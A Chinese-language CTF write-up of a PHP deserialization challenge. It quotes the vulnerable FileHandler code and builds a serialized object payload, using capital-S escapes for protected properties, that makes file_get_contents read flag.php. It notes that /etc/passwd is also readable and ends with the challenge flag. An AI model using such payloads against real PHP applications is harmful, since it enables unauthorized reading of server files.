天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境
天命:本地php是复现不了反序列化漏洞的,都不知道是版本问题还是其他问题
天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了
进来题目先看到php代码审计,是反序列化漏洞
先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的
php
// 校验你是不是ascii码里面的合法字符
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
// 接受变量然后校验,进行反序列化激活类
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str); // 反序列化
}
}接下来看一下生命周期函数和四大函数
看了一下只有读文件函数是有用的,那就要 op=2 或者op='2' 才行
php
// 生命周期函数:初始化函数
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
// 关键函数,当op等于2时候才进去正确的函数,读文件
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
// 这个函数是废的,我们要读取文件找flag,不是来写东西进文件
private function write() {
}
// 文件包含漏洞的函数,能读取所有的文件,包括/etc/passwd都能读取
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
// 打印出来
private function output($s) {
echo "[Result]: <br>";
echo $s;
}op 等于整数 2 即可,filename等于 flag.php 即可,不需要 fuzz
比赛的现场题目是需要fuzz或者寻找一些配置文件来探索flag文件在哪里的
反正权限贼高,能读到 /etc/passwd
php
class FileHandler {
public $op = 2;
public $filename = "flag.php";
public $content = "aaa";
}
$obj = new FileHandler();
echo serialize($obj);
// 最后生成如下
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:3:"aaa";}需要改动一下
改动1:把小写s改成大写S
改动2:在op前面增加\00*\00,因为私有属性是会自带 * 号,需要用\00来截断(原理不清楚)
奇怪的地方:$op是整数2,不能是字符串的2,很奇怪,明明字符串的2也可以啊
改好后最终答案如下
php
O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:3:"aaa";}flag{5f3275d0-e4ee-4faa-b72c-8c129a7c3400}